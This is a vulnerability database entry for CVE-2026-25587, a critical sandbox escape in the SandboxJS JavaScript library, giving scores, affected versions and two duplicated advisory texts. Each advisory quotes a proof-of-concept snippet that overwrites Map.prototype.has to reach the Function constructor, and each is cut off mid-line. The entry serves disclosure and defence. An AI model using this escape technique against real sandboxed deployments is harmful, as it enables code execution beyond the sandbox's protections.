CVE-2026-25587
published 2026-02-06CVE-2026-25587: SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, as Map is in SAFE_PROTOYPES, it's prototype can be obtained via Map.prototype. By overwriting…
PriorityP353critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
EPSS
0.65%
46.3th percentile
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, as Map is in SAFE_PROTOYPES, it's prototype can be obtained via Map.prototype. By overwriting Map.prototype.has the sandbox can be escaped. This vulnerability is fixed in 0.8.29.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nyariv | sandboxjs | < 0.8.29 | 0.8.29 |
| nyariv | sandboxjs | >= 0 < 0.8.29 | 0.8.29 |
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ghsa10.0CRITICAL
osv10.0CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
@nyariv/sandboxjs has a Sandbox Escape vulnerability
osv·2026-02-05·CVSS 10.0
CVE-2026-25587 [CRITICAL] @nyariv/sandboxjs has a Sandbox Escape vulnerability
@nyariv/sandboxjs has a Sandbox Escape vulnerability
### Summary
As `Map` is in `SAFE_PROTOYPES`, it's prototype can be obtained via `Map.prototype`. By overwriting `Map.prototype.has` the sandbox can be escaped.
### Details
This is effectively equivalent to CVE-2026-25142, but without `__lookupGetter__` (`let` was used during testing), it turns out the `let` implementation is bugged:
```js
let a = Map.prototype;
console.log(a) // undefined
```
```js
const a = Map.prototype;
console.log(a) // Object [Map] {}
```
```js
let a = 123;
console.log(a) // 123
```
```js
const a = 123;
console.log(a) // 123
```
### PoC
```js
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
const m = Map.prototype;
m.has = isFinite;
console.log(
isFinite.constructor(
"retur
GHSA
@nyariv/sandboxjs has a Sandbox Escape vulnerability
ghsa·2026-02-05·CVSS 10.0
CVE-2026-25587 [CRITICAL] CWE-74 @nyariv/sandboxjs has a Sandbox Escape vulnerability
@nyariv/sandboxjs has a Sandbox Escape vulnerability
### Summary
As `Map` is in `SAFE_PROTOYPES`, it's prototype can be obtained via `Map.prototype`. By overwriting `Map.prototype.has` the sandbox can be escaped.
### Details
This is effectively equivalent to CVE-2026-25142, but without `__lookupGetter__` (`let` was used during testing), it turns out the `let` implementation is bugged:
```js
let a = Map.prototype;
console.log(a) // undefined
```
```js
const a = Map.prototype;
console.log(a) // Object [Map] {}
```
```js
let a = 123;
console.log(a) // 123
```
```js
const a = 123;
console.log(a) // 123
```
### PoC
```js
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
const m = Map.prototype;
m.has = isFinite;
console.log(
isFinite.constructor(
"retur
No detection rules found.
No public exploits indexed.
2026-02-06
Published